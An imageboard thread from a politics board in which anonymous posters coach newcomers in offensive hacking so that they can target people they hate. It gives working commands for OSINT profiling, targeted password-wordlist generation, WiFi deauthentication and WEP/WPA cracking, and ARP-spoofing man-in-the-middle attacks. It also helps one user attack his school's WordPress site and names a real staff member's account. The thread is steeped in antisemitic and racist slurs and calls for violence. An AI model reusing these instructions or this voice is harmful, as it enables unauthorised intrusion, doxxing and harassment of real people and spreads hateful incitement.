/pnd/ - Politics, News, Debate

>Using jewgle to find links to reddit, linkdin and facebook

>Hacking

>>13985

>tries to come off as 1337 when he doesn't even tails his tor connection

>>13999

>A fresh new LARP thread!

Checking those sick digits fellow anon!

>>13985

where'd you go?

fellow anon

>>13997

I'm pretty tired and same-fagging around other posts is making me doomer.

First thing you faggots want to do when you open your VMWare Kali Box is install macchanger

just do this: alt-t

this will open a terminal window

you should see a blinking cursor

type the following:

sudo apt-get install macchanger -y

let it do it's thing and install.now, turn off the network connection (in the box) you'll be able to figure that out, it's really easy, then in the terminal window type this

macchanger eth0 down

macchanger -r eth0

macchanger eth0 up

do that shit. You might get some DNS resolution problems at this point, but that's an easy fix. Let me know if you do. If you want to get stupid and start hacking wifi shit right away, just type wifite into that terminal window after you have changed your mac ID with macchanger.

If you're having DNS problems, which you may, save a text file to your desktop with "nameserver 1.1.1.1" in it. Save the file as resolv.conf

then type locate resolve.conf in the terminal window and replace that document with the one you saved as resolv.conf

if you're having issues, ask.

(def xmy x z ( (*) x z)))

>Being as most of you faggots are using Windows,

lol not i sir

>>14037

Go back to >>>/g/

>>14049

are you samefaggin?

>>13997

>find the .vmdk or vmx image

<OVA image

the pre-made installlation for VMWare come in .OVA

>>13983

So I became haxx0r by installing linux?

And using virtual machines?

Being a haxx0r was never so easy.

>>13983

>>13997

>>14031

God bless you for this effort. We need more of these posts around here.

>>14117

kek, no

I'm hoping we can at least get 10-20 guys who can script kitty theharvester, kingphisher and maybe a few other tools to conduct successful OSINT and fuck with the degenerate kikes who think they can just break any law they like because nobody is paying attention.

Things like PhoneInfoga require authcodes and are too much trouble to set up 10 different profiles to run. if we had a group of even 5 guys on the board here, we could be much more efficient. Maybe build everyone up to sharing a Maltego platform and start making sure criminals in high places get so lit up they won't throw a napkin out of a car without fearing we are watching them.

>>14129

if anyone is having difficulty connecting or the connecting just spinning wheels on you, close your kali linux virtual box and go to the settings in the VMWare player for the kali box. Set your network connection to Bridged

depending on the windows version you have, it may need to be bridged when running Tor.

>>13983

I'm already on Ubuntu, easiest way to install kali besides ubuntu? Don't wanna erase it, and since im not that good with linux overall, how to make sure I don't fuck up the dual boot stuff? Let's say after installation I have no option to dual boot, it goes straight to kali. Quick tip on that?

>>14160

install vmware in ubuntu

>>13997

>Extract the zip file as a folder on the desktop.

>Create new in workstation

>Navigate to that folder and choose the Kali vdmx file

>Boot up

>Use username "root", password is "toor" without quotes.

Just posting this for stuck anons.

>>14160

Thank You, brudya!

I haven't touched a windows box in a long time, so be sure to help me out if I miss anything.

Should I bring up proxychains and proxybroker now or you think it might be boogaloo overload?

>>14170

Yes keep going

I wrote this up right quick to pull, parse and disburse a list of proxies that can be uploaded to a scrip like ProxyChains.

first open the terminal and move to the desktop

#_mv ~/Desktop

git clone https://github.com/constverum/ProxyBroker.git

cd ./ProxyBroker

pip3 install ./requirements.txt (I think this is right, but not sure)

python3 proxybroker.py find –types SOCKS5 –limit 15 >/home/usr/Desktop/IP_stuff/proxylist.txt

grep -E -o "……..([0-9]{1,3}[\.]){3}[0-9]{1,3}:…." /home/usr/Desktop/IP_stuff/proxylist.txt >/home/usr/Desktop/IP_stuff/test.txt

sed -e 's/]/ /g' /home/usr/Desktop/IP_stuff/test.txt >/home/usr/Desktop/IP_stuff/test1.txt

sed -e 's/:/ /g' /home/tyler/Desktop/IP_stuff/test1.txt >/home/usr/Desktop/IP_stuff/test2.txt

ok, so after that you should have a file test2.txt on your desktop with 15 SOCKS5 proxies in it. Yay!

If anyone wants to clean this up and make it into an executable, that'd be cool. For everyone else, if you copy the taxt commands above and save them in a file on your desktop, you can just pull it up each time you need to renew your proxies.

If you just want a quick list of proxies, do this:

└──╼ $sudo su

[sudo] password for :

root@templeOS:/home/usr/Pictures/8kunHackCourse# proxybroker find –types SOCKS5 –limit 15

<Proxy US 0.10s [SOCKS5] 75.119.205.242:45165>

<Proxy US 0.11s [SOCKS5] 166.62.85.161:44122>

<Proxy US 0.11s [SOCKS5] 216.144.230.233:15993>

<Proxy US 0.27s [SOCKS5] 192.169.218.22:12309>

<Proxy US 0.29s [SOCKS5] 97.74.6.64:22347>

<Proxy US 0.32s [SOCKS5] 173.236.176.136:27986>

<Proxy SG 0.38s [SOCKS5] 139.99.104.233:41553>

<Proxy US 0.39s [SOCKS5] 64.90.54.126:31943>

<Proxy DE 0.47s [SOCKS5] 144.76.27.12:1091>

<Proxy US 0.51s [SOCKS5] 132.148.146.65:50507>

<Proxy US 0.13s [SOCKS5] 207.97.174.134:1080>

<Proxy DE 0.66s [SOCKS5] 144.76.70.133:1091>

<Proxy US 0.14s [SOCKS5] 96.44.183.149:55225>

<Proxy US 0.15s [SOCKS5] 98.143.145.29:62354>

<Proxy US 0.16s [SOCKS5] 96.44.133.110:58690>

These are all public, btw. Same as me posting a list of websites. Nothing illegal or against the rules. We don't do those things.

>>13983

>>13997

>>14031

>>14125

>>14129

/newfags/ - don't fuck with the last part of this yet. You'll demoralize yourself thinking this was easy for us when we were new. It wasn't. Just stick with the above posts, get youself a Kali Linux VM going with AnonSurf, crack open your web browser and chill out until tomorrow.

I be tired n shit. Looking at my last post, I realized how alienating it must be to you guys. Just disregard the proxy shit for now.

we all gonna make it, anons!

>>14534

this looks hard to make out:

theHarvester -d motleyjew.com -l 100 -b google -h ~/motelyjew.html

Make sure the H is the only capitalized letter or your it won't be recognized.

>>13999

I like a bit of fun/sarcasm in posts, keeps them lively.

This looks interesting

Will take closer look during the weekend

>VMWare

Try VirtualBox

>>13997

i know for a fact that kali lunix is strong OS for cracking passwords. Idk about untraceable parts. Also isnt it just more safe to build a cheap PC for kali alone?

>anonymemeHQ

lol what year is it

>u need Linux to be a 1337 anonymeme larper

no. plenty of skids like u use windows as well, just put a guy fawkes mask as ur wallpaper and install a matrix screensaver. operating system is irrelevant to someone who knows his way around a computer and he can accomplish all the same things regardless.

>kali linux

cringe. just install a regular distro and the software you need.

>>13997

>Do you know how stupid it is to funnel a tool that spiders through ~6k potential sockets into one VPN?

>No, you don't.

This doesn't answer what he said or even mean anything, tthese are just random words to make you sound smart. jfc I hope I didn't have this much unwarranted hubris when I was 15.

>>14534

Hey Cody, your wallpaper is fucking gay. Also use vim.

Rolled 5, 4 = 9 (2d6)

>>14166

Thanks got stuck on the password.

>>14534

I'm excited for more. keep it up anon.

>>13983

if i havent been lurking for 739 days yet, is there any hope for me? or am i destined to be a nigger for the rest of my life?

>>14125

When I do the anonsurf install this happens:

>root@kali:~# sudo apt-get install anonsurf

>Reading package lists… Done

>Building dependency tree

>Reading state information… Done

>E: Unable to locate package anonsurf

Any solution?

>>13983

>>13997

>>14031

>>14125

>>14129

>>14257

>>14534

>>14537

Keep doing this OP, please ignore the boomers, schizos, and shills.

hello fren,

below you will find my best attempt at relaying the most important thing in the wheat tractor world wide interwebs to you.

being able to figure out your lost password for sites you logged in to and weren't smart enough to write it down! GURRRR I hate

when that happens\

lets talk about two very cool tools that Kali offers. the first of which is cewl. cewl will let you enter the domain of your facebook page, twitter page, any other pages where you have made a lot of posts pertaining to your personal life, like the names of your kids, wife, husband (faggot, there are not girs ont he internet), dog, mistress, favorite video game, book, author… you get the idea! cewl will let you get all that information on YOURSELF really quickly! yay! Below is how to make it work. It'll work if you work it, it won't if you don't!

cewl [arguments] domain

-d = depth

-m = min word len

-o = offsite links

-w = same as output / write to xxxxx.html or xxxxx.txt

-v = verbosity

-e = include emails

–email_file /home/emailfile.txt

proxy is a pain in the ass

proxy_host

Proxy_port

proxy_username

proxy_password

default port is 8080, all others must be input manually

example command line interface command for cewl

cewl -d 3 -m 5 -v -e –email_file /home/faggot.txt -v -w /home/faggot.html https://www.cewlproject.com

——————————————————————————–

what follows next is what to do with all those forgotten words so you can figure out that pesky password you lost!

next lets talk about crunch

we really should spend many days on crunch. it is very very

really really

kind of important when you want to become cleet whacker in sportsball tournament.

crunch <min> <max> [charset]

/usr/share/wordlists

pre-installed wordlists of general terms

#!_cd /home/desktop

usage:

crunch <from-len> <to-len> [-f <path to charset.lst> charset-name] [-o wordlist.txt or START] [-t [FIXED]@@@@] [-s startblock]

#_crunch 8 10 abcdefg12345678 -o wordlist1.txt

Crunch will now generate the following amount of data: 12820477378560 bytes

12226560 MB

11940 GB

11 TB

-t = to define the pattern

-c = how many lines do we want

-s =the starting word

-d = how many duplicates are allowed

-f = Charset

-b = limit the size of the file

-o = output file

-l = escape meta characters and use in the pattern

-z = compress file

meta characters

@ = lowercase

, = uppercase

% = numbers

^ = symbols

>>15327

do you see how much fun we're having now?

imagine, if you will, you find all the words relevant to yourself

and you make a list quick like this

ni@@er%%

ni,,er%%

n%gg%r

ni^^er88

you get the idea? In no time at all, you will have that lost

password and be able to log back into your reddit account! Yay!

>>14885

you're going to have to manually install it. I will walk you through.

git clone https://github.com/parrotsec/anonsurf.git

cd anonsurf

make .

./anonsurf.sh

I can't run through it myself on this machine because it may create conflicts with my current network setup but let me know how the above works for you. screenshots of any issues would be helpful. tnx

>2 days to write how to install unix and run scripts

This thread is hilarious

https://www.youtube.com/watch?v=2TofunAI6fU

>>15368

well, that wasn't so bad!

I guess I couldn't remember it because I forgot I spoke German! Geschutzte

protected auf Enlisch

that was a really piss poor password for myself but I'm just like everyone else!

just a quick recap of what you should be able to do up to this point.

1. from identified targets username and/or email, search and find all identical instances on all top 100 social media sites.

2. from above list, search and find identifying information of target to include, hopefully, a phone number

3. Utilize phone number for a further in-depth look at targets social profile.

4. scan, skim and parse all words of targets social media accounts.

5. pull words from that skim, substitute characters as well as add characters, when necessary, to create a list of likely passwords that would be associated with that target.

6. have a coke and eat some tendies knowing that you probably have the password for some stupid person that uses social media to put their life out for everyone to see.

Like I said, I was able to figure mine out in roughly an hour. That's pretty quick! How did I run the password against the site hash? we will go over that tomorrow when we discuss the script pyrit in detail.

>>14946

if it's not connecting, it won't connect to the VM Kali Box. It's weird about usb connections. why not use a direct connection from your computer? What tool are you wanting to use on Kali?

What kind of phone? Android or Iphone?

>>13983

Guys and OP : I left computers long time ago when Kali was still called BackTrack. But now that you give us everything on a plate, I can’t but comeback!

Thanks a lot!

Hope you will make many more of that. Maybe even a quick guide on copy paste with multiple levels after we did all that

>>15395

>everything on a plate

there's literally books worth of literature on offensive-security.com website just for script kittys. Not having a day of any (((education))) I know how confusing it is, so I'm trying to lay out a simple path to being able to build a quick profile on someone online so we can get more and more anons involved in this. It's really our greatest threat against the (((power structure))). Most of us here wouldn't offer much by way of 1488killNiggg3rsRACEWARNOW! but we can get on a box and cause some havok in some shitbags life.

We have the power to do good things from this community, we really should be focusing on this instead of all the shit we cannot do like kill 100 million or more people looking for a good life for their family.

Everyone is entitled to live the way they want to live so long as it doesn't fuck with others, the second you do that, you get the rope. All of israel gets the rope, so there's plenty of real estate coming up.

I di like this idea, teaching autists too "hack" for maximum autistry! But I am question of Op's sexuality? He talk like gay ←

(sorry for bad English am Srb:)

>>15403

every action done by other effects society either negatively or postively either through normalization or that action having "un-intended" consquences not to mention the well being mentally and pyshically of indiviuals in society effects us as a whole

>>15363

perl necklace.pl >> asshole.fu

>>15416

while the traditional concept of "truth" implies an external authority, "certainty" instead relies on the judgment of the individual.

Perhaps I'm just so NEET I stopped giving a fuck?

>>15434

meant for

>>15512

>>13997

I cant find the image

>>15436

There are hard thruths that nature puts down that we can uncover through reason.

Such as; The strong should rule the weak.

Any society that ignores that law will unavoidably find it's death.

Just because it's from an outside source (Nature) does not mean it's wrong.

>>15444

use this https://parrotlinux.org/download-security.php

download the OVA image (Virtual Image)

when you go to start the virtual machine, "create new" and skip the part about attaching an image. Set your network to NAT and leave 30GB min for the install. 1 processor and at least 4GB RAM, 8 preferred if you have 16 or greater total.

ParrotOS has AnonSurf built into it, makes it much easier. It's also a much nicer general purpose OS with the same security tools as Kali plus a few others that make it a more pleasant environment overall.

or, offensive-security.com and find downloads and find the Kali .OVA image for download.

>>15444

use this https://parrotlinux.org/download-security.php

download the OVA image (Virtual Image)

when you go to start the virtual machine, "create new" and skip the part about attaching an image. Set your network to NAT and leave 30GB min for the install. 1 processor and at least 4GB RAM, 8 preferred if you have 16 or greater total.

ParrotOS has AnonSurf built into it, makes it much easier. It's also a much nicer general purpose OS with the same security tools as Kali plus a few others that make it a more pleasant environment overall.

or, offensive-security.com and find downloads and find the Kali .OVA image for download.

>>15444

after you've done that, start and let it read "no image found" close out then move the .OVA to the newly created hard drive. Remove the virtual disk drive in settings, then save, then start the machine again.

why?

for whatever reason, some systems don't virtualize well on removable storage. ParrotOS is one of those systems.

>>13983

Bump. Keep going OP, and ignore the salty demoralisation faggots. We need more of this to bring back some decent dig threads.

>>15524

do me a favor and type this

ping 8.8.8.8

if doesn't connect, you need to resolve your DNS host

are you running anonsurf?

if so, type

service tor start and see if it starts

NETWORKING:

import socket

#the socket() module allows python to connect to networks.

import socket

socket.setdefaulttimeout(2)

S = socket.socket()

S.connect(("192.168.0.50",21))

ans - s.recv(1024)

print ans

220 FreeFloat FTP Server (V1.1)

#first we give store socket (yet to be given an argument) to the variable S

#then we tell python to connect to IP 192.168.0.50 at port 21

#then we tell python to collect the first 1024 bits of information (the head) to the variable a>

#then we print out the results

>>15537

> (the head) to the variable a>

*variable S

>>15538

jfc! sorry guys

the variable is ans

we're giving the results of the port scan to the variable ans

>>15524

on the bottom left of your screen you will see Menu

open that, next to the magnifying glass, search for theharvester

see if you find it in there.

you may just need to update your system

>>15530

>[('ftp':21, 'ssh':22, 'smptp':25, 'https':80)]

> services.keys()

> 'ftp', 'ssh', 'smtp', 'https'

> services.items()

> 21, 22, 25, 80

> services.has_key('ftp')

> True

> services.has_item(21)

> True

> services['ftp']

> 21

lets talk about the above real quick

if you notice we're just looking at the services stored int he array between the brackets up there.

when I type services (dot) something, I am asking list that I defined, ie: services, for a thing.

in the first request, I am asking services for the keys by saying services.keys()

now, if I just asked services.keys, python would be like "what the fuck, bro?" because I didn't ask python for anything

I didn't have my hands open, see?

if you want something from python, you have to ask with your hands open!

>python.gimme

python "I don't know what you're saying tyler. fuck off"

>python.gimme()

python "here you go bro! all you had to do was ask!"

>>15530

>>14129

Well, I already opened firefox at this point before configuring it.

>>14125

So I could look at this page and Alt-Tab between terminal and browser.

I hope this did not fuck anything up.

Also

>#_sudo apt-get update && apt upgrade -y

>#_sudo apt-get install anonsurf

asks me for if I should install dumpcap (for wireshark).

It says that enabling it might be a security risk so I am not sure what to do.

>>15721

enable it

you won't face any risk, that's only if you let other people use your computer, but even they wouldn't know what to do with wireshark

>>15533

can ping 8.8.8.8

anonsurf is running hmmm…

>>15774

firefox-esr

create a profile

settings - above pic (127.0.0.1 port 9050)

www.ipchicken.com

see what happens.

Yeah I see it in there thats how I opened it the first time. Will look into updating later today when I have time.

>>13983

Considering I expect the Five Eyes intelligence agencies can track pretty much anyone on the internet regardless what kind of security measures they take, I doubt anyone will have 100% security.

However as a normfag with a little bit of privacy research I'll just give my two cents how to remain anonymous/secure from most threats out there.

Get yourself a private VPN. Have Tor installed. When installed go to about:config and disable a lot the junk like telemetry, WebGL, WebRTC, healthreport, geotracking, web beacon, any third party url links. Then install a few basic add-ons such as a browser agent spoofer & HTTPS Everywhere. You want to configure the browser agent spoofer (like Chameleon) to spoof a lot of data including: accept-encoding headers, GET requests, timezone data, screen size data, etc. Make sure Noscript is blocking most scripts too. If you are extra paranoid maybe get some VPN add-on and run it inside Tor to hide your Tor exit node. VPN > Tor > VPN > hello world

Use Bleachbit to wipe out the sqlite cookies/caches in Tor when you are done with every session.

Doing all of this should pretty much render any average tracking operation useless (unless you are some kind of targeted interest on the Five Eyes radar). And even then, I guess encrypting your harddrive may help. Doing all this should be good enough for an average activist or tin foil hat clown like myself. If you highly disagree that is OK, maybe provide me a reason or two why. Just my two cents.

>>15363

I knew OP was a skiddie as soon as I saw the green text ascii image. I thought the wanna be Neo's from the Matrix died out in the early 2000s.

>h4xx0r

kek

Using ./anonsurf start returns following

>[ i ] Starting anonymous mode:

> * Tor is not running! starting it for you

> * Stopping service nscd (already stopped)

> * Stopping service resolvconf (already stopped)

> * Stopping service dnsmasq (already stopped)

>Failed to start tor.service: Unit tor.service not found.

> * Saved iptables rules

> * Modified resolv.conf to use Tor and ParrotDNS/OpenNIC

> * Disabling IPv6 for security reasons

>net.ipv6.conf.all.disable_ipv6 = 1

>net.ipv6.conf.default.disable_ipv6 = 1

> * Configuring iptables rules to route all traffic through tor

>iptables v1.8.3 (nf_tables): owner: Bad value for "–uid-owner" option: "de bian-tor"

>Try `iptables -h' or 'iptables –help' for more information.

> * Redirecting DNS traffic through tor

>iptables v1.8.3 (nf_tables): owner: Bad value for "–uid-owner" option: "de bian-tor"

>Try `iptables -h' or 'iptables –help' for more information.

>* Allowing only tor to browse in clearnet

>iptables v1.8.3 (nf_tables): owner: Bad value for "–uid-owner" option: "de bian-tor"

>Try `iptables -h' or 'iptables –help' for more information.

> * All traffic was redirected throught Tor

>[ i ] You are under AnonSurf tunnel

It says that "Failed to start tor.service: Unit tor.service not found." and also " All traffic was redirected throught Tor"

Quite confusing.

>>16107

Exactly, if i look for something i miraculously changes the fabric of reality. I think that would be called a delusion, an actual delusion not a preceived kibbuz shit shoveling one.

>>14257

error: the following arguments are required: –types

>>13983

I think hacking random persons is a very bad idea. Some people are so reckless they lose their lifes doing that.

>>15360

I also might find your home, then i come visit you.

>>16243

I mean the guy that hacked the family home, i mean he might be so reckless that he would be involved in a deadly car accident.

>>16247

Given their cowardish nature, or let me better explain it as ignorance. The main problem is that law enforcement by the niggers that they are, are not really adjusted to give adequat punishment in that regard.

>>16250

But i m fairly certain that shit like "the password guesser" will not get off so lightly in the near future.

>>16242

>>16243

>>16247

>>16250

>>16252

Does this guy not understand that we have IDs here?

>>15829

>I doubt anyone will have 100% security.

Security is for faggots.

Real men fuck the system in the ass with no condom.

>>16359

>Also it looks like I got the anonsurf finally working with this

if it's working, then no need to change settings. Leave it be. the system will have an autoconfig for anonsurf.

>>15829

this man knows.

basic privacy is this for me:

Use linux (Mint, Manjaro, Qubes OS, MX Linux)

Encrypt your entire harddrive with LUKS and a strong unique password

Configure to change your MAC address on every boot to a random address

Use a paid logless VPN and configure it well with a killswitch

Use the latest TOR with highest security settings

Never reveal personal info and use different nicknames/passwords/temporary emails everywhere

>>14037

>>14049

>replying to yourself

>doesn't understand lisp syntax

>>17787

lemegooglethatforyou

For those of you who want to get more involved and don't know where to start or maybe you just love taking shit apart to see how it works, here is a list of resources.

SANS Cyber Security: https://www.cyberaces.org/

Cybrary: https://www.cybrary.it/

Future Learn: https://www.futurelearn.com – Basics of Network Security – Network Defence Management Overview – Defence Management Overview – Security Operations – Introduction to Cybersecurity

Coursera: https://www.coursera.org – IT Fundamentals for Cybersecurity – Introduction to Cybersecurity Tools and Cyber Attacks – Cybersecurity – Cybersecurity for Business – Cybersecurity and its Ten Domains

edX: https://www.edx.org – Introduction to Cybersecurity – Building a Cybersecurity Toolkit – Cybersecurity Fundamentals – Cybersecurity: the CISCOs Perpective View – Cybersecurity Capstone – Cybersecurity Risk Management

US Department of Homeland Security Virtual Training: https://www.dhs.gov/cisa/cybersecurity-training-exercises

Hack The Box: https://www.hackthebox.eu/

IppSecc Youtube Channel: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA

lynda.com

>>17787

google employee here.

Next post with good digits will get his Wifi password posted here on this thread . Watch this guys :D

>Theharvester, maltego, macchanger, cewl, crunch, exiftool…

Man do I feel like 2012 again.

Alrighty.

>>18536

>Man do I feel like 2012 again.

man you're cool

too bad nobody will ever know it, huh? being an anymous imageboard and all.

Hacking ebooks:

https://github.com/Lz1y/hackingLibrary

https://github.com/yeahhub/Hacking-Security-Ebooks

https://github.com/yeahhub/Kali-Linux-Ebooks

https://mega.nz/#F!LvJAjSjI!V6grLdkFClpW1RDQEiuDzw

Hacking github repos/lists:

https://github.com/Hack-with-Github/Awesome-Hacking

https://github.com/enaqx/awesome-pentest

>>19595

More ebooks:

https://thepiratebay.org/torrent/8126147/Hacking_and_IT_E-Book_Dump_Part_1_-_2010Kaiser_and_UA-07

https://thepiratebay.org/torrent/8126160/Hacking_and_IT_E-Book_Dump_Part_2_-_2010Kaiser_and_UA-07

https://thepiratebay.org/torrent/8126222/Hacking_and_IT_E-Book_Dump_Part_3_-_2010Kaiser_and_UA-07

https://thepiratebay.org/torrent/8126232/Hacking_and_IT_E-Book_Dump_Part_4_-_2010Kaiser_and_UA-07

https://thepiratebay.org/torrent/8126252/Hacking_and_IT_E-Book_Dump_Part_5_-_2010Kaiser_and_UA-07

https://thepiratebay.org/torrent/8126273/Hacking_and_IT_E-Book_Dump_Part_6_-_2010Kaiser_and_UA-07

https://thepiratebay.org/torrent/8128728/Hacking_and_IT_E-Book_Dump_Part_7_-_2010_Kaiser_and_UA-07

https://thepiratebay.org/torrent/8128827/Hacking_and_IT_E-Book_Dump_Part_8_-_2010Kaiser_and_UA-07

>>19601

how can i delete system 34 when my PC is 68 bit?

>>19595

>https://mega.nz/#F!LvJAjSjI!V6grLdkFClpW1RDQEiuDzw

contains multiple trojans

>>14955

Checked

>>13983

I did everything. Can we have a following?

>>20366

you have enough info itt to get yourself arrested and enough info here >>18292 to get you a high-paying job working in the field of cyber-security.

That being said, what particular topic of discussion would you like to go further into. I'm glad to help as I believe the easiest way to learn is to teach others what you know.

>>19903

I think you're talking about the webhijacking assignment example source code in WebHijacking/index2.html that's detected as "JS:Exploit.CVE-2010-1807.A". Other than that everything either scans clean or is a .pdf or .chm file uploaded on 6/15/2019, so unless there is some pdf reader 0day that has lasted over half a year in the wild, I doubt it. Also fuzzing_four.rar has some .exe's I wouldn't run, but it scans clean and you have to search for the rar password.

>>13983

How do i take down a low effort website?

Do coding languages such as Java, Javascript, html, c++, php and others have anything to do with hacking or will having knowledge on them help out a lot when trying to hack??

>>21067

you might have a chance if its a home web server behind a cheap ISP router set up by an 18 yo.

first step is obviously info gathering, you want to learn as much about the server's software, DNS info, database info, who the webmasters are etc.

nmap is probably useful to find services running on the server.

You can also find out a lot just by triggering errors on the website (getting PHP/db errors by sending fugged up FORM/ajax data).

Reading the source of a page might be useful, keep in mind most HTML is script generated (client or server side), what you should look for is any custom javascript, wordpress plugins, or FORM submission code.

beyond that you need to find exploits that apply to the services running.

>>21068

yes absolutely.

You need to understand a language thoroughly in order to know its subtle pitfalls.

Try reading the basics of SQL injection, it won't make any sense if you don't know how db queries are made through PHP.

You might be able to use pen-testing tools like metasploit, but I've never used it.

Don't be a nigger and learn at least C, HTML, CSS, JavaScript.

>>20709

I’m the precedent poster.

Thank you so much for being willing to help.

Right now I only have two questions in my mind.

1) Can I really get a job into pentest without having any degree? What should I be able to do and where should I send my letters for what kind of job? Also should I get some certificates? If yes, which ones?

2) How do I counter all these BruteForce protections. For example I was playing with WPscan and I can’t bruteforce because of WordFence. I take it as a challenge and I’m really trying to figure out the easiest way to still bruteforce the admin account. Also, you maybe have a list of passwords to share? I use the 10 millions that we can find on GitHub

>>21173

bare with me, this is the 2nd time I'm typing this out now.

will you be able to get a job without a degree? absolutely. Is it much less likely? Absolutely! is theere a severe shortage in the supply given the demand? Absolutely! How do you know if "Pentester" is the right job for you? You took apart every toy you ever had as a child and, every once in a while, maybe put one back together. You have an undying desire to know how things work coupled with an a demeanor that makes you comfortable locked away in your room for days, weeks, mnoths on end focusing on a single problem.

There are a lot of differnt personalities in the coding/programming world, pentesters are the weirdos of the weirdos. https://defcon.org/ you also have to have a criminal personality because, well, you're interested n going places you aren't supposed to be, getting things you aren't supposed to see and all around just fucking with things. Especially 'proper' things.

hackthebox.eu is a good community of pentesters. ipsecc is a good guy to pay attention to and spends a lot of time providing valuable information to the community.

Also, calculus is a must. If you hate math, I don't think you'll like hacking. In the end, it's all math.

ctf.hacker101.com

ctftime.org

both good platforms with a good atmosphere of people.

you'll get burned out on brute-forcing really quick. I recommend spending some time on the recon, scraping the site with cewl, compiling a targeted list and putting the time into that over just throwing random passwords at a hash.

with that said:

crackstation.txt.gz - I believe 2 billion passwords in it.

github.com/trustedsec/hate_crack to help you deal with that amount of volume.

hope you have a good graphix setup.

>>21173

also on that site, turn on burpsuite and see what it offers you to work with. I don't really know where to begin on advice without knowing the target.

Does the VM setup increase security in some way, or is it just a way for windows users (like myself) to run this particular set of tools? If I have a laptop handy that I can dedicate to this would I be better off using that and saving the trouble and processing power of using a VM?

>>21266

VMs are harder to hack in order to reveal your ISP IP address

>>21267

I have a question related to VMware setups.

I’ve read that it may be a problem with some antenna adapter. Is it just a connection problem or also a performance problem?

>>21205

Do you want to know the target and play with me?

It’s the website of my school and I know it will be changed soon so it doesn’t matter if I fuck it up or not.

You can drop you pgp key or I will just try what you suggest and give you feedbacks

>>21346

That’s a better idea. Thank you!

I still have this problem with WordFence that gives me a 503 page after 2-3 passwords tried with WPscan

>RDP into Raspberry pi

>TOR on raspi

>firefags hooked up to TOR network

How safe is this?

t. already looked up DMT and psych 'shrooms on it

make sure you're not using an outdated backdoor router.

dd-wrt, openwrt, and others are easy to install and widely supported.

even an outdated dd-wrt is beter than outdated netgear/linksys shit.

>>21393

>RDP

>firefox

About as safe as nigger pussy.

Do it like a white man, a white man uses SSHv2 to access a command line, and browses from a poz-free browser such as w3m.

>>21436

It’s not about changing grades. I’m just messing up with since I saw that it was really badly built.

For example the wp-content/uploads and wp-includes are open :

https://makeupforeveracademy.brussels/wp-content/uploads/

And

https://makeupforeveracademy.brussels/wp-includes/

Well also the school is such a scam I wish I could get my money back and pay some Pentests certificates...

>>21844

user: adminacademy

password:

https://be.linkedin.com/in/tine-de-sauter-97976b137

https://makeupforeveracademy.brussels/author/tine-de-sautermakeupforever-be/

spend a little time on it and you'll figure it out.

>>21888

I saw that. Tine have another account.

I’m not sure she made the website tho. And I saw on the computer of the director that he also connect himself to this account so it can’t be something related to her life. Tine is a young teacher of 26-27 years old

>>14031

I don't like cloudflare DNS. It blocks sites like archive.is by faking that the site doesn't exist. Use quad9 DNS. They have encrypted DNS over TLS if you set it up correctly.

I can add my notes on wifi cracking—

###change MAC ID before doing anything!

ifconfig eth0 down

macchanger -r eth0

ifconfig eth0 up

###Change into monitor mode on USB adapter

ifconfig wan0 down

airmon-ng check kill (may or may not necessary)

iwconfig wlan0 mode monitor

ifconfig wlan0 up

###Monitor all wireless traffic within range

iwconfig #look for the adapter ID for monitor adapter

airodump-ng wlan0mon

###If I ever get a 5G monitor antannae

airodump-ng –band a wlxmon ##band a is 5G

airodump-ng –band abg wlxmon ###sniff on both 2.4 and 5G

##targeting a specific network

airodump-ng –bssid <BSSID> –channel <CH?> –write <filenamehere> wlxmon0

##under STATION you will see the MAC ID

$wireshark

file >> open >> capfile-01.cap

##looking for device type

##Deauth the client

airdump-ng -bssid <enter target BSSID here> –channel <7> wlan0mon ##this is running in terminal1

aireplay-ng –deauth 100000000 -a <BSSID of target network> -c <MAC ID of the target client> wlan0mon ##this is running in terminal2

######000000000000000###########

##WEP Cracking

##run airodump-ng to find WEP network

airodump-ng –bssid –channel –write wps0mon

aircrack-ng filename.cap

##copy KEY FOUND key / remove the colons

##connect to target network with the copied password

!!!###!!!### If WEP network is NOT BUSY

##Open 3 terminals

$terminal1 - airodump-ng –bssid –channel –write filename wps0mon

$termianl2 - aireplay-ng –fakeauth <0 because we only want to do this once> -a bssid -h <MAC ID>of wireless adapter = first 12 digits of the UNSPEC field / replace the minuses with colons> wps0mon

$terminal3 - aireplay-ng –arpreplay -b <bssid> -h <MAC ID of Wireless Adapter> wps0mon

##gnerate about 50,000 packets for analyzing

$terminal2 - aircrack-ng filename.cap

##WPA & WPA2 Cracking

##!!##first we try the WPS looking for Lck "No"

$terminal1 - wash –interface wps0mon

##you are going to enter the info into terminal 1 and 2 then start 2, then start 1

$terminal1 - aireplay-ng –fakeauth 30 -a <macID of target> -h <macID of Wifi Adapter> wps0mon

$terminal2 - reaver –bssid <mac of target> –channel <channel>

–interface wps0mon -vvv –no-associate

##WPA & WPA2

airodump-ng wps0mon

airodump-ng –bssid –channel –write wps0mon

aireplay-ng –deauth 4 -a <bssid> -c <macofclient> wps0mon

###continue to dauth until you capture the handshake

##Crunch - Creating a wordlist

crunch [min][max][characters]=t[pattern]-o[filename]

crunch 8 8 123abc$ -o wordlist -t a@@@@b -o /home/Desktop/file

meta characters

@ = lowercase_alpha

, = UPPER_ALPHA

% = numbers_1234567890

^ = symbols_!@#$%^&*)(_+

##passing the hash against the wordlist

aircrack-ng capture-01.cap -w wordlist.lst

##POST-CONNECTION ATTACKING

netdiscover -r 192.168.0.1/24

zenmap 192.168.0.1/24 quickscan plus

##MITM - ARP SPOOF

>terminal1

arpspoof –interface –targetIP –gateway=routerIP

arpspoof -i eth0 -t 192.168.0.3 192.168.0.1

>terminal2

aprspoof –interface –gateway=routerIP –targetIP

arpspoof -i eth0 -t 192.168.0.1 192.168.0.3

>terminal3

echo 1 > /proc/sys/net/ipv4/ip_forward

view site completely anonymously by tunneling it through TOR an reassembling it back on your machine

services tor start

$python3

>>> import socks

>>> import socket

>>> socks.set_default_proxy(socks.SOCKS5, "127.0.0.1", 9050)

>>> socket.socket = socks.socksocket

# now lets make sure our tunnel is working

>>> import requests

>>> r = requests.get("http://icanhazip.com")

>>> r.content

b'81.17.27.141\n'

# now that we know tunnel is working, we can grab a site and re-assemble back on our lcoal computer

>>> import pipes

>>> r = requests.get("http://8kun.top/pnd/threadyouarereadinghere")

>>> t = pipes.Template(r)

>>> f = t.open('pipefile.html')

>>> f.write(r)

>>> f.close()

>>> open('pipefile').read()

sometimes it doesn't pipe out right for me, might be a compatibility issue with my host OS or I might just be a retarded faggot but you can always just r.content and copy/past the results into a .html file to view.

I use this on sites I really don't want to be logged as a visitor on. you might have some of those sites yourself, r… right, guys?

